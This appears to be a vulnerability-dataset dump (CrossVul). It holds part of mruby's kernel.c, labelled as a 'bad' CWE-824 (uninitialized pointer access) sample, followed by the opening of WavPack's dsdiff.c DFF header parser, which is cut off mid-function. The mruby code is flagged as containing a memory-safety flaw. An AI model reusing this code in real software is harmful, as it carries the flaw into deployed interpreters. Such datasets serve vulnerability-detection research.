* This method may have class-specific behavior. If so, that
* behavior will be documented under the #+initialize_copy+ method of
* the class.
*/
MRB_API mrb_value
mrb_obj_dup(mrb_state *mrb, mrb_value obj)
{
struct RBasic *p;
mrb_value dup;
if (mrb_immediate_p(obj)) {
mrb_raisef(mrb, E_TYPE_ERROR, "can't dup %S", obj);
}
if (mrb_type(obj) == MRB_TT_SCLASS) {
mrb_raise(mrb, E_TYPE_ERROR, "can't dup singleton class");
}
p = mrb_obj_alloc(mrb, mrb_type(obj), mrb_obj_class(mrb, obj));
dup = mrb_obj_value(p);
init_copy(mrb, dup, obj);
return dup;
}
static mrb_value
mrb_obj_extend(mrb_state *mrb, mrb_int argc, mrb_value *argv, mrb_value obj)
{
mrb_int i;
if (argc == 0) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "wrong number of arguments (at least 1)");
}
for (i = 0; i < argc; i++) {
mrb_check_type(mrb, argv[i], MRB_TT_MODULE);
}
while (argc--) {
mrb_funcall(mrb, argv[argc], "extend_object", 1, obj);
mrb_funcall(mrb, argv[argc], "extended", 1, obj);
}
return obj;
}
/* 15.3.1.3.13 */
/*
* call-seq:
* obj.extend(module, ...) -> obj
*
* Adds to _obj_ the instance methods from each module given as a
* parameter.
*
* module Mod
* def hello
* "Hello from Mod.\n"
* end
* end
*
* class Klass
* def hello
* "Hello from Klass.\n"
* end
* end
*
* k = Klass.new
* k.hello #=> "Hello from Klass.\n"
* k.extend(Mod) #=> #<Klass:0x401b3bc8>
* k.hello #=> "Hello from Mod.\n"
*/
static mrb_value
mrb_obj_extend_m(mrb_state *mrb, mrb_value self)
{
mrb_value *argv;
mrb_int argc;
mrb_get_args(mrb, "*", &argv, &argc);
return mrb_obj_extend(mrb, argc, argv, self);
}
static mrb_value
mrb_obj_freeze(mrb_state *mrb, mrb_value self)
{
struct RBasic *b;
switch (mrb_type(self)) {
case MRB_TT_FALSE:
case MRB_TT_TRUE:
case MRB_TT_FIXNUM:
case MRB_TT_SYMBOL:
#ifndef MRB_WITHOUT_FLOAT
case MRB_TT_FLOAT:
#endif
return self;
default:
break;
}
b = mrb_basic_ptr(self);
if (!MRB_FROZEN_P(b)) {
MRB_SET_FROZEN_FLAG(b);
}
return self;
}
static mrb_value
mrb_obj_frozen(mrb_state *mrb, mrb_value self)
{
struct RBasic *b;
switch (mrb_type(self)) {
case MRB_TT_FALSE:
case MRB_TT_TRUE:
case MRB_TT_FIXNUM:
case MRB_TT_SYMBOL:
#ifndef MRB_WITHOUT_FLOAT
case MRB_TT_FLOAT:
#endif
return mrb_true_value();
default:
break;
}
b = mrb_basic_ptr(self);
if (!MRB_FROZEN_P(b)) {
return mrb_false_value();
}
return mrb_true_value();
}
/* 15.3.1.3.15 */
/*
* call-seq:
* obj.hash -> fixnum
*
* Generates a <code>Fixnum</code> hash value for this object. This
* function must have the property that <code>a.eql?(b)</code> implies
* <code>a.hash == b.hash</code>. The hash value is used by class
* <code>Hash</code>. Any hash value that exceeds the capacity of a
* <code>Fixnum</code> will be truncated before being used.
*/
MRB_API mrb_value
mrb_obj_hash(mrb_state *mrb, mrb_value self)
{
return mrb_fixnum_value(mrb_obj_id(self));
}
/* 15.3.1.3.16 */
static mrb_value
mrb_obj_init_copy(mrb_state *mrb, mrb_value self)
{
mrb_value orig;
mrb_get_args(mrb, "o", &orig);
if (mrb_obj_equal(mrb, self, orig)) return self;
if ((mrb_type(self) != mrb_type(orig)) || (mrb_obj_class(mrb, self) != mrb_obj_class(mrb, orig))) {
mrb_raise(mrb, E_TYPE_ERROR, "initialize_copy should take same class object");
}
return self;
}
MRB_API mrb_bool
mrb_obj_is_instance_of(mrb_state *mrb, mrb_value obj, struct RClass* c)
{
if (mrb_obj_class(mrb, obj) == c) return TRUE;
return FALSE;
}
/* 15.3.1.3.19 */
/*
* call-seq:
* obj.instance_of?(class) -> true or false
*
* Returns <code>true</code> if <i>obj</i> is an instance of the given
* class. See also <code>Object#kind_of?</code>.
*/
static mrb_value
obj_is_instance_of(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "C", &arg);
return mrb_bool_value(mrb_obj_is_instance_of(mrb, self, mrb_class_ptr(arg)));
}
/* 15.3.1.3.20 */
/*
* call-seq:
* obj.instance_variable_defined?(symbol) -> true or false
*
* Returns <code>true</code> if the given instance variable is
* defined in <i>obj</i>.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_defined?(:@a) #=> true
* fred.instance_variable_defined?("@b") #=> true
* fred.instance_variable_defined?("@c") #=> false
*/
static mrb_value
mrb_obj_ivar_defined(mrb_state *mrb, mrb_value self)
{
mrb_sym sym;
mrb_get_args(mrb, "n", &sym);
mrb_iv_check(mrb, sym);
return mrb_bool_value(mrb_iv_defined(mrb, self, sym));
}
/* 15.3.1.3.21 */
/*
* call-seq:
* obj.instance_variable_get(symbol) -> obj
*
* Returns the value of the given instance variable, or nil if the
* instance variable is not set. The <code>@</code> part of the
* variable name should be included for regular instance
* variables. Throws a <code>NameError</code> exception if the
* supplied symbol is not valid as an instance variable name.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_get(:@a) #=> "cat"
* fred.instance_variable_get("@b") #=> 99
*/
static mrb_value
mrb_obj_ivar_get(mrb_state *mrb, mrb_value self)
{
mrb_sym iv_name;
mrb_get_args(mrb, "n", &iv_name);
mrb_iv_check(mrb, iv_name);
return mrb_iv_get(mrb, self, iv_name);
}
/* 15.3.1.3.22 */
/*
* call-seq:
* obj.instance_variable_set(symbol, obj) -> obj
*
* Sets the instance variable names by <i>symbol</i> to
* <i>object</i>, thereby frustrating the efforts of the class's
* author to attempt to provide proper encapsulation. The variable
* did not have to exist prior to this call.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_set(:@a, 'dog') #=> "dog"
* fred.instance_variable_set(:@c, 'cat') #=> "cat"
* fred.inspect #=> "#<Fred:0x401b3da8 @a=\"dog\", @b=99, @c=\"cat\">"
*/
static mrb_value
mrb_obj_ivar_set(mrb_state *mrb, mrb_value self)
{
mrb_sym iv_name;
mrb_value val;
mrb_get_args(mrb, "no", &iv_name, &val);
mrb_iv_check(mrb, iv_name);
mrb_iv_set(mrb, self, iv_name, val);
return val;
}
/* 15.3.1.3.24 */
/* 15.3.1.3.26 */
/*
* call-seq:
* obj.is_a?(class) -> true or false
* obj.kind_of?(class) -> true or false
*
* Returns <code>true</code> if <i>class</i> is the class of
* <i>obj</i>, or if <i>class</i> is one of the superclasses of
* <i>obj</i> or modules included in <i>obj</i>.
*
* module M; end
* class A
* include M
* end
* class B < A; end
* class C < B; end
* b = B.new
* b.instance_of? A #=> false
* b.instance_of? B #=> true
* b.instance_of? C #=> false
* b.instance_of? M #=> false
* b.kind_of? A #=> true
* b.kind_of? B #=> true
* b.kind_of? C #=> false
* b.kind_of? M #=> true
*/
static mrb_value
mrb_obj_is_kind_of_m(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "C", &arg);
return mrb_bool_value(mrb_obj_is_kind_of(mrb, self, mrb_class_ptr(arg)));
}
KHASH_DECLARE(st, mrb_sym, char, FALSE)
KHASH_DEFINE(st, mrb_sym, char, FALSE, kh_int_hash_func, kh_int_hash_equal)
static void
method_entry_loop(mrb_state *mrb, struct RClass* klass, khash_t(st)* set)
{
khint_t i;
khash_t(mt) *h = klass->mt;
if (!h || kh_size(h) == 0) return;
for (i=0;i<kh_end(h);i++) {
if (kh_exist(h, i)) {
mrb_method_t m = kh_value(h, i);
if (MRB_METHOD_UNDEF_P(m)) continue;
kh_put(st, mrb, set, kh_key(h, i));
}
}
}
mrb_value
mrb_class_instance_method_list(mrb_state *mrb, mrb_bool recur, struct RClass* klass, int obj)
{
khint_t i;
mrb_value ary;
mrb_bool prepended = FALSE;
struct RClass* oldklass;
khash_t(st)* set = kh_init(st, mrb);
if (!recur && (klass->flags & MRB_FLAG_IS_PREPENDED)) {
MRB_CLASS_ORIGIN(klass);
prepended = TRUE;
}
oldklass = 0;
while (klass && (klass != oldklass)) {
method_entry_loop(mrb, klass, set);
if ((klass->tt == MRB_TT_ICLASS && !prepended) ||
(klass->tt == MRB_TT_SCLASS)) {
}
else {
if (!recur) break;
}
oldklass = klass;
klass = klass->super;
}
ary = mrb_ary_new_capa(mrb, kh_size(set));
for (i=0;i<kh_end(set);i++) {
if (kh_exist(set, i)) {
mrb_ary_push(mrb, ary, mrb_symbol_value(kh_key(set, i)));
}
}
kh_destroy(st, mrb, set);
return ary;
}
static mrb_value
mrb_obj_singleton_methods(mrb_state *mrb, mrb_bool recur, mrb_value obj)
{
khint_t i;
mrb_value ary;
struct RClass* klass;
khash_t(st)* set = kh_init(st, mrb);
klass = mrb_class(mrb, obj);
if (klass && (klass->tt == MRB_TT_SCLASS)) {
method_entry_loop(mrb, klass, set);
klass = klass->super;
}
if (recur) {
while (klass && ((klass->tt == MRB_TT_SCLASS) || (klass->tt == MRB_TT_ICLASS))) {
method_entry_loop(mrb, klass, set);
klass = klass->super;
}
}
ary = mrb_ary_new(mrb);
for (i=0;i<kh_end(set);i++) {
if (kh_exist(set, i)) {
mrb_ary_push(mrb, ary, mrb_symbol_value(kh_key(set, i)));
}
}
kh_destroy(st, mrb, set);
return ary;
}
static mrb_value
mrb_obj_methods(mrb_state *mrb, mrb_bool recur, mrb_value obj, mrb_method_flag_t flag)
{
return mrb_class_instance_method_list(mrb, recur, mrb_class(mrb, obj), 0);
}
/* 15.3.1.3.31 */
/*
* call-seq:
* obj.methods -> array
*
* Returns a list of the names of methods publicly accessible in
* <i>obj</i>. This will include all the methods accessible in
* <i>obj</i>'s ancestors.
*
* class Klass
* def kMethod()
* end
* end
* k = Klass.new
* k.methods[0..9] #=> [:kMethod, :respond_to?, :nil?, :is_a?,
* # :class, :instance_variable_set,
* # :methods, :extend, :__send__, :instance_eval]
* k.methods.length #=> 42
*/
static mrb_value
mrb_obj_methods_m(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, (mrb_method_flag_t)0); /* everything but private */
}
/* 15.3.1.3.32 */
/*
* call_seq:
* nil.nil? -> true
* <anything_else>.nil? -> false
*
* Only the object <i>nil</i> responds <code>true</code> to <code>nil?</code>.
*/
static mrb_value
mrb_false(mrb_state *mrb, mrb_value self)
{
return mrb_false_value();
}
/* 15.3.1.3.36 */
/*
* call-seq:
* obj.private_methods(all=true) -> array
*
* Returns the list of private methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_private_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PRIVATE); /* private attribute not define */
}
/* 15.3.1.3.37 */
/*
* call-seq:
* obj.protected_methods(all=true) -> array
*
* Returns the list of protected methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_protected_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PROTECTED); /* protected attribute not define */
}
/* 15.3.1.3.38 */
/*
* call-seq:
* obj.public_methods(all=true) -> array
*
* Returns the list of public methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_public_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PUBLIC); /* public attribute not define */
}
/* 15.3.1.2.12 */
/* 15.3.1.3.40 */
/*
* call-seq:
* raise
* raise(string)
* raise(exception [, string])
*
* With no arguments, raises a <code>RuntimeError</code>
* With a single +String+ argument, raises a
* +RuntimeError+ with the string as a message. Otherwise,
* the first parameter should be the name of an +Exception+
* class (or an object that returns an +Exception+ object when sent
* an +exception+ message). The optional second parameter sets the
* message associated with the exception, and the third parameter is an
* array of callback information. Exceptions are caught by the
* +rescue+ clause of <code>begin...end</code> blocks.
*
* raise "Failed to create socket"
* raise ArgumentError, "No parameters", caller
*/
MRB_API mrb_value
mrb_f_raise(mrb_state *mrb, mrb_value self)
{
mrb_value a[2], exc;
mrb_int argc;
argc = mrb_get_args(mrb, "|oo", &a[0], &a[1]);
switch (argc) {
case 0:
mrb_raise(mrb, E_RUNTIME_ERROR, "");
break;
case 1:
if (mrb_string_p(a[0])) {
a[1] = a[0];
argc = 2;
a[0] = mrb_obj_value(E_RUNTIME_ERROR);
}
/* fall through */
default:
exc = mrb_make_exception(mrb, argc, a);
mrb_exc_raise(mrb, exc);
break;
}
return mrb_nil_value(); /* not reached */
}
static mrb_value
mrb_krn_class_defined(mrb_state *mrb, mrb_value self)
{
mrb_value str;
mrb_get_args(mrb, "S", &str);
return mrb_bool_value(mrb_class_defined(mrb, RSTRING_PTR(str)));
}
/* 15.3.1.3.41 */
/*
* call-seq:
* obj.remove_instance_variable(symbol) -> obj
*
* Removes the named instance variable from <i>obj</i>, returning that
* variable's value.
*
* class Dummy
* attr_reader :var
* def initialize
* @var = 99
* end
* def remove
* remove_instance_variable(:@var)
* end
* end
* d = Dummy.new
* d.var #=> 99
* d.remove #=> 99
* d.var #=> nil
*/
static mrb_value
mrb_obj_remove_instance_variable(mrb_state *mrb, mrb_value self)
{
mrb_sym sym;
mrb_value val;
mrb_get_args(mrb, "n", &sym);
mrb_iv_check(mrb, sym);
val = mrb_iv_remove(mrb, self, sym);
if (mrb_undef_p(val)) {
mrb_name_error(mrb, sym, "instance variable %S not defined", mrb_sym2str(mrb, sym));
}
return val;
}
void
mrb_method_missing(mrb_state *mrb, mrb_sym name, mrb_value self, mrb_value args)
{
mrb_no_method_error(mrb, name, args, "undefined method '%S'", mrb_sym2str(mrb, name));
}
/* 15.3.1.3.30 */
/*
* call-seq:
* obj.method_missing(symbol [, *args] ) -> result
*
* Invoked by Ruby when <i>obj</i> is sent a message it cannot handle.
* <i>symbol</i> is the symbol for the method called, and <i>args</i>
* are any arguments that were passed to it. By default, the interpreter
* raises an error when this method is called. However, it is possible
* to override the method to provide more dynamic behavior.
* If it is decided that a particular method should not be handled, then
* <i>super</i> should be called, so that ancestors can pick up the
* missing method.
* The example below creates
* a class <code>Roman</code>, which responds to methods with names
* consisting of roman numerals, returning the corresponding integer
* values.
*
* class Roman
* def romanToInt(str)
* # ...
* end
* def method_missing(methId)
* str = methId.id2name
* romanToInt(str)
* end
* end
*
* r = Roman.new
* r.iv #=> 4
* r.xxiii #=> 23
* r.mm #=> 2000
*/
#ifdef MRB_DEFAULT_METHOD_MISSING
static mrb_value
mrb_obj_missing(mrb_state *mrb, mrb_value mod)
{
mrb_sym name;
mrb_value *a;
mrb_int alen;
mrb_get_args(mrb, "n*!", &name, &a, &alen);
mrb_method_missing(mrb, name, mod, mrb_ary_new_from_values(mrb, alen, a));
/* not reached */
return mrb_nil_value();
}
#endif
static inline mrb_bool
basic_obj_respond_to(mrb_state *mrb, mrb_value obj, mrb_sym id, int pub)
{
return mrb_respond_to(mrb, obj, id);
}
/* 15.3.1.3.43 */
/*
* call-seq:
* obj.respond_to?(symbol, include_private=false) -> true or false
*
* Returns +true+ if _obj_ responds to the given
* method. Private methods are included in the search only if the
* optional second parameter evaluates to +true+.
*
* If the method is not implemented,
* as Process.fork on Windows, File.lchmod on GNU/Linux, etc.,
* false is returned.
*
* If the method is not defined, <code>respond_to_missing?</code>
* method is called and the result is returned.
*/
static mrb_value
obj_respond_to(mrb_state *mrb, mrb_value self)
{
mrb_value mid;
mrb_sym id, rtm_id;
mrb_bool priv = FALSE, respond_to_p = TRUE;
mrb_get_args(mrb, "o|b", &mid, &priv);
if (mrb_symbol_p(mid)) {
id = mrb_symbol(mid);
}
else {
mrb_value tmp;
if (mrb_string_p(mid)) {
tmp = mrb_check_intern_str(mrb, mid);
}
else {
tmp = mrb_check_string_type(mrb, mid);
if (mrb_nil_p(tmp)) {
tmp = mrb_inspect(mrb, mid);
mrb_raisef(mrb, E_TYPE_ERROR, "%S is not a symbol", tmp);
}
tmp = mrb_check_intern_str(mrb, tmp);
}
if (mrb_nil_p(tmp)) {
respond_to_p = FALSE;
}
else {
id = mrb_symbol(tmp);
}
}
if (respond_to_p) {
respond_to_p = basic_obj_respond_to(mrb, self, id, !priv);
}
if (!respond_to_p) {
rtm_id = mrb_intern_lit(mrb, "respond_to_missing?");
if (basic_obj_respond_to(mrb, self, rtm_id, !priv)) {
mrb_value args[2], v;
args[0] = mid;
args[1] = mrb_bool_value(priv);
v = mrb_funcall_argv(mrb, self, rtm_id, 2, args);
return mrb_bool_value(mrb_bool(v));
}
}
return mrb_bool_value(respond_to_p);
}
/* 15.3.1.3.45 */
/*
* call-seq:
* obj.singleton_methods(all=true) -> array
*
* Returns an array of the names of singleton methods for <i>obj</i>.
* If the optional <i>all</i> parameter is true, the list will include
* methods in modules included in <i>obj</i>.
* Only public and protected singleton methods are returned.
*
* module Other
* def three() end
* end
*
* class Single
* def Single.four() end
* end
*
* a = Single.new
*
* def a.one()
* end
*
* class << a
* include Other
* def two()
* end
* end
*
* Single.singleton_methods #=> [:four]
* a.singleton_methods(false) #=> [:two, :one]
* a.singleton_methods #=> [:two, :one, :three]
*/
static mrb_value
mrb_obj_singleton_methods_m(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_singleton_methods(mrb, recur, self);
}
static mrb_value
mod_define_singleton_method(mrb_state *mrb, mrb_value self)
{
struct RProc *p;
mrb_method_t m;
mrb_sym mid;
mrb_value blk = mrb_nil_value();
mrb_get_args(mrb, "n&", &mid, &blk);
if (mrb_nil_p(blk)) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "no block given");
}
p = (struct RProc*)mrb_obj_alloc(mrb, MRB_TT_PROC, mrb->proc_class);
mrb_proc_copy(p, mrb_proc_ptr(blk));
p->flags |= MRB_PROC_STRICT;
MRB_METHOD_FROM_PROC(m, p);
mrb_define_method_raw(mrb, mrb_class_ptr(mrb_singleton_class(mrb, self)), mid, m);
return mrb_symbol_value(mid);
}
static mrb_value
mrb_obj_ceqq(mrb_state *mrb, mrb_value self)
{
mrb_value v;
mrb_int i, len;
mrb_sym eqq = mrb_intern_lit(mrb, "===");
mrb_value ary = mrb_ary_splat(mrb, self);
mrb_get_args(mrb, "o", &v);
len = RARRAY_LEN(ary);
for (i=0; i<len; i++) {
mrb_value c = mrb_funcall_argv(mrb, mrb_ary_entry(ary, i), eqq, 1, &v);
if (mrb_test(c)) return mrb_true_value();
}
return mrb_false_value();
}
/* 15.3.1.2.7 */
/*
* call-seq:
* local_variables -> array
*
* Returns the names of local variables in the current scope.
*
* [mruby limitation]
* If variable symbol information was stripped out from
* compiled binary files using `mruby-strip -l`, this
* method always returns an empty array.
*/
static mrb_value
mrb_local_variables(mrb_state *mrb, mrb_value self)
{
struct RProc *proc;
mrb_irep *irep;
mrb_value vars;
size_t i;
proc = mrb->c->ci[-1].proc;
if (MRB_PROC_CFUNC_P(proc)) {
return mrb_ary_new(mrb);
}
vars = mrb_hash_new(mrb);
while (proc) {
if (MRB_PROC_CFUNC_P(proc)) break;
irep = proc->body.irep;
if (!irep->lv) break;
for (i = 0; i + 1 < irep->nlocals; ++i) {
if (irep->lv[i].name) {
mrb_hash_set(mrb, vars, mrb_symbol_value(irep->lv[i].name), mrb_true_value());
}
}
if (!MRB_PROC_ENV_P(proc)) break;
proc = proc->upper;
//if (MRB_PROC_SCOPE_P(proc)) break;
if (!proc->c) break;
}
return mrb_hash_keys(mrb, vars);
}
mrb_value mrb_obj_equal_m(mrb_state *mrb, mrb_value);
void
mrb_init_kernel(mrb_state *mrb)
{
struct RClass *krn;
mrb->kernel_module = krn = mrb_define_module(mrb, "Kernel"); /* 15.3.1 */
mrb_define_class_method(mrb, krn, "block_given?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.2.2 */
mrb_define_class_method(mrb, krn, "global_variables", mrb_f_global_variables, MRB_ARGS_NONE()); /* 15.3.1.2.4 */
mrb_define_class_method(mrb, krn, "iterator?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.2.5 */
mrb_define_class_method(mrb, krn, "local_variables", mrb_local_variables, MRB_ARGS_NONE()); /* 15.3.1.2.7 */
; /* 15.3.1.2.11 */
mrb_define_class_method(mrb, krn, "raise", mrb_f_raise, MRB_ARGS_OPT(2)); /* 15.3.1.2.12 */
mrb_define_method(mrb, krn, "singleton_class", mrb_singleton_class, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "===", mrb_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.2 */
mrb_define_method(mrb, krn, "block_given?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.3.6 */
mrb_define_method(mrb, krn, "class", mrb_obj_class_m, MRB_ARGS_NONE()); /* 15.3.1.3.7 */
mrb_define_method(mrb, krn, "clone", mrb_obj_clone, MRB_ARGS_NONE()); /* 15.3.1.3.8 */
mrb_define_method(mrb, krn, "dup", mrb_obj_dup, MRB_ARGS_NONE()); /* 15.3.1.3.9 */
mrb_define_method(mrb, krn, "eql?", mrb_obj_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.10 */
mrb_define_method(mrb, krn, "equal?", mrb_obj_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.11 */
mrb_define_method(mrb, krn, "extend", mrb_obj_extend_m, MRB_ARGS_ANY()); /* 15.3.1.3.13 */
mrb_define_method(mrb, krn, "freeze", mrb_obj_freeze, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "frozen?", mrb_obj_frozen, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "global_variables", mrb_f_global_variables, MRB_ARGS_NONE()); /* 15.3.1.3.14 */
mrb_define_method(mrb, krn, "hash", mrb_obj_hash, MRB_ARGS_NONE()); /* 15.3.1.3.15 */
mrb_define_method(mrb, krn, "initialize_copy", mrb_obj_init_copy, MRB_ARGS_REQ(1)); /* 15.3.1.3.16 */
mrb_define_method(mrb, krn, "inspect", mrb_obj_inspect, MRB_ARGS_NONE()); /* 15.3.1.3.17 */
mrb_define_method(mrb, krn, "instance_of?", obj_is_instance_of, MRB_ARGS_REQ(1)); /* 15.3.1.3.19 */
mrb_define_method(mrb, krn, "instance_variable_defined?", mrb_obj_ivar_defined, MRB_ARGS_REQ(1)); /* 15.3.1.3.20 */
mrb_define_method(mrb, krn, "instance_variable_get", mrb_obj_ivar_get, MRB_ARGS_REQ(1)); /* 15.3.1.3.21 */
mrb_define_method(mrb, krn, "instance_variable_set", mrb_obj_ivar_set, MRB_ARGS_REQ(2)); /* 15.3.1.3.22 */
mrb_define_method(mrb, krn, "instance_variables", mrb_obj_instance_variables, MRB_ARGS_NONE()); /* 15.3.1.3.23 */
mrb_define_method(mrb, krn, "is_a?", mrb_obj_is_kind_of_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.24 */
mrb_define_method(mrb, krn, "iterator?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.3.25 */
mrb_define_method(mrb, krn, "kind_of?", mrb_obj_is_kind_of_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.26 */
mrb_define_method(mrb, krn, "local_variables", mrb_local_variables, MRB_ARGS_NONE()); /* 15.3.1.3.28 */
#ifdef MRB_DEFAULT_METHOD_MISSING
mrb_define_method(mrb, krn, "method_missing", mrb_obj_missing, MRB_ARGS_ANY()); /* 15.3.1.3.30 */
#endif
mrb_define_method(mrb, krn, "methods", mrb_obj_methods_m, MRB_ARGS_OPT(1)); /* 15.3.1.3.31 */
mrb_define_method(mrb, krn, "nil?", mrb_false, MRB_ARGS_NONE()); /* 15.3.1.3.32 */
mrb_define_method(mrb, krn, "object_id", mrb_obj_id_m, MRB_ARGS_NONE()); /* 15.3.1.3.33 */
mrb_define_method(mrb, krn, "private_methods", mrb_obj_private_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.36 */
mrb_define_method(mrb, krn, "protected_methods", mrb_obj_protected_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.37 */
mrb_define_method(mrb, krn, "public_methods", mrb_obj_public_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.38 */
mrb_define_method(mrb, krn, "raise", mrb_f_raise, MRB_ARGS_ANY()); /* 15.3.1.3.40 */
mrb_define_method(mrb, krn, "remove_instance_variable", mrb_obj_remove_instance_variable,MRB_ARGS_REQ(1)); /* 15.3.1.3.41 */
mrb_define_method(mrb, krn, "respond_to?", obj_respond_to, MRB_ARGS_ANY()); /* 15.3.1.3.43 */
mrb_define_method(mrb, krn, "send", mrb_f_send, MRB_ARGS_ANY()); /* 15.3.1.3.44 */
mrb_define_method(mrb, krn, "singleton_methods", mrb_obj_singleton_methods_m, MRB_ARGS_OPT(1)); /* 15.3.1.3.45 */
mrb_define_method(mrb, krn, "define_singleton_method", mod_define_singleton_method, MRB_ARGS_ANY());
mrb_define_method(mrb, krn, "to_s", mrb_any_to_s, MRB_ARGS_NONE()); /* 15.3.1.3.46 */
mrb_define_method(mrb, krn, "__case_eqq", mrb_obj_ceqq, MRB_ARGS_REQ(1)); /* internal */
mrb_define_method(mrb, krn, "class_defined?", mrb_krn_class_defined, MRB_ARGS_REQ(1));
mrb_include_module(mrb, mrb->object_class, mrb->kernel_module);
mrb_alias_method(mrb, mrb->module_class, mrb_intern_lit(mrb, "dup"), mrb_intern_lit(mrb, "clone"));
}
| ./CrossVul/dataset_final_sorted/CWE-824/c/bad_168_0 |
crossvul-cpp_data_good_824_0 | ////////////////////////////////////////////////////////////////////////////
// **** WAVPACK **** //
// Hybrid Lossless Wavefile Compressor //
// Copyright (c) 1998 - 2019 David Bryant. //
// All Rights Reserved. //
// Distributed under the BSD Software License (see license.txt) //
////////////////////////////////////////////////////////////////////////////
// dsdiff.c
// This module is a helper to the WavPack command-line programs to support DFF files.
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <math.h>
#include <stdio.h>
#include <ctype.h>
#include "wavpack.h"
#include "utils.h"
#include "md5.h"
#ifdef _WIN32
#define strdup(x) _strdup(x)
#endif
#define WAVPACK_NO_ERROR 0
#define WAVPACK_SOFT_ERROR 1
#define WAVPACK_HARD_ERROR 2
extern int debug_logging_mode;
#pragma pack(push,2)
typedef struct {
char ckID [4];
int64_t ckDataSize;
} DFFChunkHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
char formType [4];
} DFFFileHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint32_t version;
} DFFVersionChunk;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint32_t sampleRate;
} DFFSampleRateChunk;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint16_t numChannels;
} DFFChannelsHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
char compressionType [4];
} DFFCompressionHeader;
#pragma pack(pop)
#define DFFChunkHeaderFormat "4D"
#define DFFFileHeaderFormat "4D4"
#define DFFVersionChunkFormat "4DL"
#define DFFSampleRateChunkFormat "4DL"
#define DFFChannelsHeaderFormat "4DS"
#define DFFCompressionHeaderFormat "4D4"
int ParseDsdiffHeaderConfig (FILE *infile, char *infilename, char *fourcc, WavpackContext *wpc, WavpackConfig *config)
{
int64_t infilesize, total_samples;
DFFFileHeader dff_file_header;
DFFChunkHeader dff_chunk_header;
uint32_t bcount;
infilesize = DoGetFileSize (infile);
memcpy (&dff_file_header, fourcc, 4);
if ((!DoReadFile (infile, ((char *) &dff_file_header) + 4, sizeof (DFFFileHeader) - 4, &bcount) ||
bcount != sizeof (DFFFileHeader) - 4) || strncmp (dff_file_header.formType, "DSD ", 4)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &dff_file_header, sizeof (DFFFileHeader))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
#if 1 // this might be a little too picky...
WavpackBigEndianToNative (&dff_file_header, DFFFileHeaderFormat);
if (infilesize && !(config->qmode & QMODE_IGNORE_LENGTH) &&
dff_file_header.ckDataSize && dff_file_header.ckDataSize + 1 && dff_file_header.ckDataSize + 12 != infilesize) {
error_line ("%s is not a valid .DFF file (by total size)!", infilename);
return WAVPACK_SOFT_ERROR;
}
if (debug_logging_mode)
error_line ("file header indicated length = %lld", dff_file_header.ckDataSize);
#endif
// loop through all elements of the DSDIFF header
// (until the data chuck) and copy them to the output file
while (1) {
if (!DoReadFile (infile, &dff_chunk_header, sizeof (DFFChunkHeader), &bcount) ||
bcount != sizeof (DFFChunkHeader)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &dff_chunk_header, sizeof (DFFChunkHeader))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
WavpackBigEndianToNative (&dff_chunk_header, DFFChunkHeaderFormat);
if (debug_logging_mode)
error_line ("chunk header indicated length = %lld", dff_chunk_header.ckDataSize);
